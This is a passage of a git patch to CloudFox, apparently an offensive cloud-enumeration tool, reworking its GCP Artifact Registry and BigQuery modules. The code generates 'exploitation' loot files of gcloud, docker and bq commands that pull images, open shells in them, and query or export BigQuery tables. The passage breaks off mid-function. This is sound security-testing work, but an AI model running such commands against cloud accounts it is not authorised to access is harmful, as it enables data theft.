From 83d9611732a12e717588b7f001a102755276f3db Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Wed, 17 Dec 2025 14:52:06 -0500 Subject: [PATCH 01/48] init --- cli/gcp.go | 1 + gcp/commands/artifact-registry.go | 585 +++++++-- gcp/commands/bigquery.go | 453 +++++-- gcp/commands/buckets.go | 492 ++++++-- gcp/commands/iam.go | 766 ++++++++++-- gcp/commands/instances.go | 545 +++++++-- gcp/commands/permissions.go | 642 ++++++++++ gcp/commands/secrets.go | 435 +++++-- gcp/sdk/cache.go | 60 + gcp/sdk/clients.go | 185 +++ gcp/sdk/interfaces.go | 138 +++ .../artifactRegistryService.go | 246 +++- .../artifactRegistryService/models.go | 54 +- .../bigqueryService/bigqueryService.go | 358 +++++- .../cloudStorageService.go | 367 ++++-- .../computeEngineService.go | 258 +++- gcp/services/iamService/iamService.go | 1070 ++++++++++++++++- gcp/services/networkService/networkService.go | 18 +- gcp/services/secretsService/secretsService.go | 319 ++++- globals/gcp.go | 19 +- internal/gcp/base.go | 228 ++++ internal/gcp/session.go | 442 +++++++ internal/output2.go | 708 ++++++++++- 23 files changed, 7654 insertions(+), 735 deletions(-) create mode 100644 gcp/commands/permissions.go create mode 100644 gcp/sdk/cache.go create mode 100644 gcp/sdk/clients.go create mode 100644 gcp/sdk/interfaces.go create mode 100644 internal/gcp/base.go create mode 100644 internal/gcp/session.go diff --git a/cli/gcp.go b/cli/gcp.go index e69efb6b..ee5da707 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -102,6 +102,7 @@ func init() { commands.GCPBigQueryCommand, commands.GCPSecretsCommand, commands.GCPIAMCommand, + commands.GCPPermissionsCommand, commands.GCPInstancesCommand, commands.GCPWhoAmICommand, GCPAllChecksCommand, diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index 3214fc43..56ec8b27 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -1,10 +1,14 @@ package commands import ( + "context" "fmt" + "strings" + "sync" artifactregistry "cloud.google.com/go/artifactregistry/apiv1" ArtifactRegistryService "github.com/BishopFox/cloudfox/gcp/services/artifactRegistryService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" @@ -12,161 +16,512 @@ import ( var GCPArtifactRegistryCommand = &cobra.Command{ Use: globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP artifact registry information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available artifact registry resource information: -cloudfox gcp artfact-registry`, + Aliases: []string{"ar", "artifacts", "gcr"}, + Short: "Enumerate GCP Artifact Registry and Container Registry with security configuration", + Long: `Enumerate GCP Artifact Registry and legacy Container Registry (gcr.io) with security-relevant details. + +Features: +- Lists all Artifact Registry repositories with security configuration +- Shows Docker images and package artifacts with tags and digests +- Enumerates IAM policies per repository and identifies public repositories +- Shows encryption type (Google-managed vs CMEK) +- Shows repository mode (standard, virtual, remote) +- Generates gcloud commands for artifact enumeration +- Generates exploitation commands for artifact access +- Enumerates legacy Container Registry (gcr.io) locations + +Security Columns: +- Public: Whether the repository has allUsers or allAuthenticatedUsers access +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Mode: STANDARD_REPOSITORY, VIRTUAL_REPOSITORY, or REMOTE_REPOSITORY +- RegistryType: "artifact-registry" or "container-registry" (legacy gcr.io)`, Run: runGCPArtifactRegistryCommand, } -// Code needed to output fields from buckets results using generic HandleOutput function +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type ArtifactRegistryModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Artifacts []ArtifactRegistryService.ArtifactInfo + Repositories []ArtifactRegistryService.RepositoryInfo + LootMap map[string]*internal.LootFile + client *artifactregistry.Client + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type ArtifactRegistryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ArtifactRegistryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ArtifactRegistryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create Artifact Registry client + client, err := artifactregistry.NewClient(cmdCtx.Ctx) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Failed to create Artifact Registry client: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + return + } + defer client.Close() + + // Create module instance + module := &ArtifactRegistryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Artifacts: []ArtifactRegistryService.ArtifactInfo{}, + Repositories: []ArtifactRegistryService.RepositoryInfo{}, + LootMap: make(map[string]*internal.LootFile), + client: client, + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ArtifactRegistryModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, m.processProject) + + // Check results + if len(m.Repositories) == 0 && len(m.Artifacts) == 0 { + logger.InfoM("No artifact registries found", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d repository(ies) with %d artifact(s)", len(m.Repositories), len(m.Artifacts)), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *ArtifactRegistryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating artifact registries in project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + // Create service and fetch data + ars := ArtifactRegistryService.New(m.client) + result, err := ars.RepositoriesAndArtifacts(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating artifact registries in project %s: %v", projectID, err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + return + } + + // Thread-safe append + m.mu.Lock() + m.Repositories = append(m.Repositories, result.Repositories...) + m.Artifacts = append(m.Artifacts, result.Artifacts...) + + // Generate loot for each repository and artifact + for _, repo := range result.Repositories { + m.addRepositoryToLoot(repo) + } + for _, artifact := range result.Artifacts { + m.addArtifactToLoot(artifact) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d repository(ies) and %d artifact(s) in project %s", len(result.Repositories), len(result.Artifacts), projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ArtifactRegistryModule) initializeLootFiles() { + m.LootMap["artifact-registry-gcloud-commands"] = &internal.LootFile{ + Name: "artifact-registry-gcloud-commands", + Contents: "# GCP Artifact Registry Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["artifact-registry-docker-commands"] = &internal.LootFile{ + Name: "artifact-registry-docker-commands", + Contents: "# GCP Artifact Registry Docker Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["artifact-registry-exploitation"] = &internal.LootFile{ + Name: "artifact-registry-exploitation", + Contents: "# GCP Artifact Registry Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["artifact-registry-public"] = &internal.LootFile{ + Name: "artifact-registry-public", + Contents: "# PUBLIC GCP Artifact Registry Repositories\n# Generated by CloudFox\n# These repositories have allUsers or allAuthenticatedUsers access!\n\n", + } + m.LootMap["artifact-registry-iam-bindings"] = &internal.LootFile{ + Name: "artifact-registry-iam-bindings", + Contents: "# GCP Artifact Registry IAM Bindings\n# Generated by CloudFox\n\n", + } + m.LootMap["container-registry-commands"] = &internal.LootFile{ + Name: "container-registry-commands", + Contents: "# GCP Container Registry (gcr.io) Commands\n# Generated by CloudFox\n# Legacy Container Registry - consider migrating to Artifact Registry\n\n", + } +} + +func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryService.RepositoryInfo) { + // Extract repo name from full path + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] + } + + // Handle legacy Container Registry differently + if repo.RegistryType == "container-registry" { + m.LootMap["container-registry-commands"].Contents += fmt.Sprintf( + "# Container Registry: %s (Project: %s)\n"+ + "# Configure Docker authentication:\n"+ + "gcloud auth configure-docker %s\n"+ + "# List images:\n"+ + "gcloud container images list --repository=%s/%s\n"+ + "# Check for public access (via storage bucket):\n"+ + "gsutil iam get gs://artifacts.%s.appspot.com\n\n", + repo.Name, repo.ProjectID, + strings.Split(repo.Name, "/")[0], // gcr.io hostname + strings.Split(repo.Name, "/")[0], repo.ProjectID, + repo.ProjectID, + ) + return + } + + // gcloud commands for Artifact Registry enumeration + m.LootMap["artifact-registry-gcloud-commands"].Contents += fmt.Sprintf( + "# Repository: %s (Project: %s, Location: %s, Format: %s)\n"+ + "# Mode: %s, Encryption: %s, Public: %s\n"+ + "gcloud artifacts repositories describe %s --project=%s --location=%s\n"+ + "gcloud artifacts repositories get-iam-policy %s --project=%s --location=%s\n\n", + repoName, repo.ProjectID, repo.Location, repo.Format, + repo.Mode, repo.EncryptionType, repo.PublicAccess, + repoName, repo.ProjectID, repo.Location, + repoName, repo.ProjectID, repo.Location, + ) + + // Docker commands for Docker repositories + if repo.Format == "DOCKER" { + m.LootMap["artifact-registry-docker-commands"].Contents += fmt.Sprintf( + "# Docker Repository: %s\n"+ + "# Configure Docker authentication:\n"+ + "gcloud auth configure-docker %s-docker.pkg.dev\n"+ + "# List images:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n\n", + repoName, + repo.Location, + repo.Location, repo.ProjectID, repoName, + ) + } + + // Public repositories + if repo.IsPublic { + m.LootMap["artifact-registry-public"].Contents += fmt.Sprintf( + "# REPOSITORY: %s\n"+ + "# Project: %s, Location: %s\n"+ + "# Public Access: %s\n"+ + "# Format: %s, Mode: %s\n"+ + "gcloud artifacts repositories get-iam-policy %s --project=%s --location=%s\n\n", + repoName, + repo.ProjectID, repo.Location, + repo.PublicAccess, + repo.Format, repo.Mode, + repoName, repo.ProjectID, repo.Location, + ) + } -// Results struct that implements the internal.OutputInterface -type GCPArtifactRegistryResults struct { - ArtifactData []ArtifactRegistryService.ArtifactInfo - RepositoryData []ArtifactRegistryService.RepositoryInfo + // IAM bindings + if len(repo.IAMBindings) > 0 { + m.LootMap["artifact-registry-iam-bindings"].Contents += fmt.Sprintf( + "# Repository: %s (Project: %s, Location: %s)\n", + repoName, repo.ProjectID, repo.Location, + ) + for _, binding := range repo.IAMBindings { + m.LootMap["artifact-registry-iam-bindings"].Contents += fmt.Sprintf( + "# Role: %s\n# Members: %s\n", + binding.Role, + strings.Join(binding.Members, ", "), + ) + } + m.LootMap["artifact-registry-iam-bindings"].Contents += "\n" + } } -// Decide what format the name, header and body of the CSV & JSON files will be -func (g GCPArtifactRegistryResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +func (m *ArtifactRegistryModule) addArtifactToLoot(artifact ArtifactRegistryService.ArtifactInfo) { + // Exploitation commands for Docker images + if artifact.Format == "DOCKER" { + m.LootMap["artifact-registry-exploitation"].Contents += fmt.Sprintf( + "# Docker Image: %s (Version: %s)\n"+ + "# Pull image:\n"+ + "docker pull %s-docker.pkg.dev/%s/%s/%s:%s\n"+ + "# Inspect image:\n"+ + "docker inspect %s-docker.pkg.dev/%s/%s/%s:%s\n"+ + "# Run image for analysis:\n"+ + "docker run -it --entrypoint /bin/sh %s-docker.pkg.dev/%s/%s/%s:%s\n\n", + artifact.Name, artifact.Version, + artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name, artifact.Version, + artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name, artifact.Version, + artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name, artifact.Version, + ) + } +} +// ------------------------------ +// Helper Functions +// ------------------------------ +func artifactBoolToCheck(b bool) string { + if b { + return "✓" + } + return "-" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main repository table with security-relevant columns repoHeader := []string{ + "Project ID", "Name", "Format", - "Description", - "Size", "Location", - "ProjectID", + "Mode", + "Public", + "Encryption", + "RegistryType", + "Size", } var repoBody [][]string + for _, repo := range m.Repositories { + // Extract repo name from full path + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] + } - for _, value := range g.RepositoryData { - repoBody = append( - repoBody, - []string{ - value.Name, - value.Format, - value.Description, - value.SizeBytes, - value.Location, - value.ProjectID, - }, - ) - } + // Format public access display + publicDisplay := repo.PublicAccess + if repo.IsPublic { + publicDisplay = "PUBLIC: " + repo.PublicAccess + } - repoTableFile := internal.TableFile{ - Header: repoHeader, - Body: repoBody, - Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), - } + // Shorten mode for display + mode := repo.Mode + mode = strings.TrimPrefix(mode, "REPOSITORY_MODE_") + mode = strings.TrimSuffix(mode, "_REPOSITORY") - tableFiles = append(tableFiles, repoTableFile) + repoBody = append(repoBody, []string{ + repo.ProjectID, + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + repo.RegistryType, + repo.SizeBytes, + }) + } + // Artifact table with enhanced fields artifactHeader := []string{ + "Project ID", "Name", - "Format", - "Version", - "Location", "Repository", + "Location", + "Tags", + "Digest", "Size", - "Updated", - "ProjectID", + "Uploaded", } var artifactBody [][]string + for _, artifact := range m.Artifacts { + // Format tags + tags := "-" + if len(artifact.Tags) > 0 { + if len(artifact.Tags) <= 3 { + tags = strings.Join(artifact.Tags, ", ") + } else { + tags = fmt.Sprintf("%s (+%d more)", strings.Join(artifact.Tags[:3], ", "), len(artifact.Tags)-3) + } + } - for _, value := range g.ArtifactData { - artifactBody = append( - artifactBody, - []string{ - value.Name, - value.Format, - value.Version, - value.Location, - value.Repository, - value.SizeBytes, - value.Updated, - value.ProjectID, - }, - ) - } + // Shorten digest for display + digest := artifact.Digest + if len(digest) > 16 { + digest = digest[:16] + "..." + } - artifactTableFile := internal.TableFile{ - Header: artifactHeader, - Body: artifactBody, - Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + artifactBody = append(artifactBody, []string{ + artifact.ProjectID, + artifact.Name, + artifact.Repository, + artifact.Location, + tags, + digest, + artifact.SizeBytes, + artifact.Uploaded, + }) } - tableFiles = append(tableFiles, artifactTableFile) + // IAM bindings table - one row per member + iamHeader := []string{ + "Repository", + "Project ID", + "Location", + "Role", + "Member Type", + "Member", + } - return tableFiles -} + var iamBody [][]string + for _, repo := range m.Repositories { + // Skip container-registry entries (no IAM at repo level) + if repo.RegistryType == "container-registry" { + continue + } -// Decide what is loot based on resource information -func (g GCPArtifactRegistryResults) LootFiles() []internal.LootFile { - // TODO consider a loot file of the URLs to the all docker image artifacts. Maybe sample commands to pull the images - return []internal.LootFile{} -} + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] + } -// Houses high-level logic that retrieves resources and writes to output -func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs from parent (gcp command) ctx - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + for _, binding := range repo.IAMBindings { + for _, member := range binding.Members { + memberType := ArtifactRegistryService.GetMemberType(member) + iamBody = append(iamBody, []string{ + repoName, + repo.ProjectID, + repo.Location, + binding.Role, + memberType, + member, + }) + } + } } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + // Public repositories table + publicHeader := []string{ + "Repository", + "Project ID", + "Location", + "Format", + "Public Access", + "Mode", } - client, err := artifactregistry.NewClient(ctx) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to create secret manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) - return + var publicBody [][]string + for _, repo := range m.Repositories { + if repo.IsPublic { + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] + } + + publicBody = append(publicBody, []string{ + repoName, + repo.ProjectID, + repo.Location, + repo.Format, + repo.PublicAccess, + repo.Mode, + }) + } } - defer client.Close() - // Get the artifact repositories and artifacts using the projectIDs and ArtifactRegistryService - ars := ArtifactRegistryService.New(client) - var artifactResults []ArtifactRegistryService.ArtifactInfo - var repoRestuls []ArtifactRegistryService.RepositoryInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all artifact repositories and supported artifacts in all locations from project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - result, err := ars.RepositoriesAndArtifacts(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - return + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) } + } - artifactResults = append(artifactResults, result.Artifacts...) - repoRestuls = append(repoRestuls, result.Repositories...) - logger.InfoM(fmt.Sprintf("Done retrieving artifact repository resource data from project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - cloudfoxOutput := GCPArtifactRegistryResults{ArtifactData: artifactResults, RepositoryData: repoRestuls} + // Build table files + tableFiles := []internal.TableFile{ + { + Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: repoHeader, + Body: repoBody, + }, + } - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - return - } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + // Add artifacts table if there are any + if len(artifactBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: artifactHeader, + Body: artifactBody, + }) + } + + // Add IAM table if there are bindings + if len(iamBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "artifact-registry-iam", + Header: iamHeader, + Body: iamBody, + }) + } + + // Add public repositories table if any + if len(publicBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "artifact-registry-public", + Header: publicHeader, + Body: publicBody, + }) + } + + output := ArtifactRegistryOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index 01b67fd7..809f2e3a 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -1,134 +1,411 @@ package commands import ( + "context" "fmt" + "strings" + "sync" "time" BigQueryService "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) var GCPBigQueryCommand = &cobra.Command{ - Use: "bigquery", - Aliases: []string{}, - Short: "Display Bigquery datasets and tables information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available Bigquery datasets and tables resource information: -cloudfox gcp bigquery`, + Use: globals.GCP_BIGQUERY_MODULE_NAME, + Aliases: []string{"bq"}, + Short: "Enumerate GCP BigQuery datasets and tables with security analysis", + Long: `Enumerate GCP BigQuery datasets and tables across projects with security-focused analysis. + +Features: +- Lists all BigQuery datasets with security-relevant columns +- Shows tables within each dataset with encryption and type info +- Enumerates dataset access control entries (IAM-like) +- Identifies publicly accessible datasets (allUsers/allAuthenticatedUsers) +- Shows encryption status (Google-managed vs CMEK) +- Generates bq commands for data enumeration +- Generates exploitation commands for data access`, Run: runGCPBigQueryCommand, } -// GCPBigQueryResults struct that implements the internal.OutputInterface -type GCPBigQueryResults struct { - DatasetsData []BigQueryService.BigqueryDataset - TablesData []BigQueryService.BigqueryTable +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type BigQueryModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Datasets []BigQueryService.BigqueryDataset + Tables []BigQueryService.BigqueryTable + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type BigQueryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigQueryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigQueryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBigQueryCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGQUERY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &BigQueryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Datasets: []BigQueryService.BigqueryDataset{}, + Tables: []BigQueryService.BigqueryTable{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BigQueryModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGQUERY_MODULE_NAME, m.processProject) + + // Check results + if len(m.Datasets) == 0 && len(m.Tables) == 0 { + logger.InfoM("No BigQuery datasets found", globals.GCP_BIGQUERY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d dataset(s) with %d table(s)", len(m.Datasets), len(m.Tables)), globals.GCP_BIGQUERY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *BigQueryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating BigQuery in project: %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) + } + + // Create service and fetch data + bqService := BigQueryService.New() + result, err := bqService.BigqueryDatasetsAndTables(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating BigQuery in project %s: %v", projectID, err), globals.GCP_BIGQUERY_MODULE_NAME) + } + return + } + + // Thread-safe append + m.mu.Lock() + m.Datasets = append(m.Datasets, result.Datasets...) + m.Tables = append(m.Tables, result.Tables...) + + // Generate loot for each dataset and table + for _, dataset := range result.Datasets { + m.addDatasetToLoot(dataset) + } + for _, table := range result.Tables { + m.addTableToLoot(table) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d dataset(s) and %d table(s) in project %s", len(result.Datasets), len(result.Tables), projectID), globals.GCP_BIGQUERY_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BigQueryModule) initializeLootFiles() { + m.LootMap["bigquery-bq-commands"] = &internal.LootFile{ + Name: "bigquery-bq-commands", + Contents: "# GCP BigQuery Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["bigquery-gcloud-commands"] = &internal.LootFile{ + Name: "bigquery-gcloud-commands", + Contents: "# GCP BigQuery gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["bigquery-exploitation"] = &internal.LootFile{ + Name: "bigquery-exploitation", + Contents: "# GCP BigQuery Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["bigquery-public-datasets"] = &internal.LootFile{ + Name: "bigquery-public-datasets", + Contents: "# GCP BigQuery Public Datasets\n# Generated by CloudFox\n# These datasets have public access (allUsers or allAuthenticatedUsers)\n\n", + } + m.LootMap["bigquery-access-bindings"] = &internal.LootFile{ + Name: "bigquery-access-bindings", + Contents: "# GCP BigQuery Dataset Access Bindings\n# Generated by CloudFox\n\n", + } +} + +func (m *BigQueryModule) addDatasetToLoot(dataset BigQueryService.BigqueryDataset) { + // bq commands for enumeration + m.LootMap["bigquery-bq-commands"].Contents += fmt.Sprintf( + "# Dataset: %s (Project: %s, Location: %s)\n"+ + "bq show --project_id=%s %s\n"+ + "bq ls --project_id=%s %s\n\n", + dataset.DatasetID, dataset.ProjectID, dataset.Location, + dataset.ProjectID, dataset.DatasetID, + dataset.ProjectID, dataset.DatasetID, + ) + + // gcloud commands + m.LootMap["bigquery-gcloud-commands"].Contents += fmt.Sprintf( + "# Dataset: %s\n"+ + "gcloud alpha bq datasets describe %s --project=%s\n"+ + "bq show --format=prettyjson %s:%s\n\n", + dataset.DatasetID, + dataset.DatasetID, dataset.ProjectID, + dataset.ProjectID, dataset.DatasetID, + ) + + // Add to public datasets loot if public + if dataset.IsPublic { + m.LootMap["bigquery-public-datasets"].Contents += fmt.Sprintf( + "# Dataset: %s (Project: %s)\n"+ + "# Public Access: %s\n"+ + "# Location: %s\n"+ + "bq show --project_id=%s %s\n\n", + dataset.DatasetID, dataset.ProjectID, + dataset.PublicAccess, + dataset.Location, + dataset.ProjectID, dataset.DatasetID, + ) + } + + // Add access bindings to loot + if len(dataset.AccessEntries) > 0 { + m.LootMap["bigquery-access-bindings"].Contents += fmt.Sprintf( + "# Dataset: %s (Project: %s)\n", + dataset.DatasetID, dataset.ProjectID, + ) + for _, entry := range dataset.AccessEntries { + m.LootMap["bigquery-access-bindings"].Contents += fmt.Sprintf( + " Role: %s, Type: %s, Entity: %s\n", + entry.Role, entry.EntityType, entry.Entity, + ) + } + m.LootMap["bigquery-access-bindings"].Contents += "\n" + } +} + +func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { + // Exploitation commands for tables + m.LootMap["bigquery-exploitation"].Contents += fmt.Sprintf( + "# Table: %s.%s (Project: %s)\n"+ + "# Size: %d bytes\n"+ + "# Query first 100 rows:\n"+ + "bq query --project_id=%s --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 100'\n"+ + "# Export table to GCS:\n"+ + "bq extract --project_id=%s '%s:%s.%s' gs:///export_%s_%s.json\n\n", + table.DatasetID, table.TableID, table.ProjectID, + table.NumBytes, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.DatasetID, table.TableID, + ) } -// Define the format for CSV & JSON output -func (g GCPBigQueryResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Dataset table with security columns + datasetHeader := []string{ + "Project ID", + "Dataset ID", + "Name", + "Location", + "Public", + "Encryption", + "Access Entries", + "Creation Time", + } - // For Datasets - datasetHeader := []string{"Name", "DatasetID", "Description", "CreationTime", "LastModifiedTime", "Location", "ProjectID"} var datasetBody [][]string - for _, dataset := range g.DatasetsData { + for _, dataset := range m.Datasets { + publicStatus := boolToCheckMark(dataset.IsPublic) + if dataset.IsPublic { + publicStatus = dataset.PublicAccess + } + datasetBody = append(datasetBody, []string{ - dataset.Name, + dataset.ProjectID, dataset.DatasetID, - dataset.Description, - dataset.CreationTime.Format(time.RFC3339), - dataset.LastModifiedTime.Format(time.RFC3339), + dataset.Name, 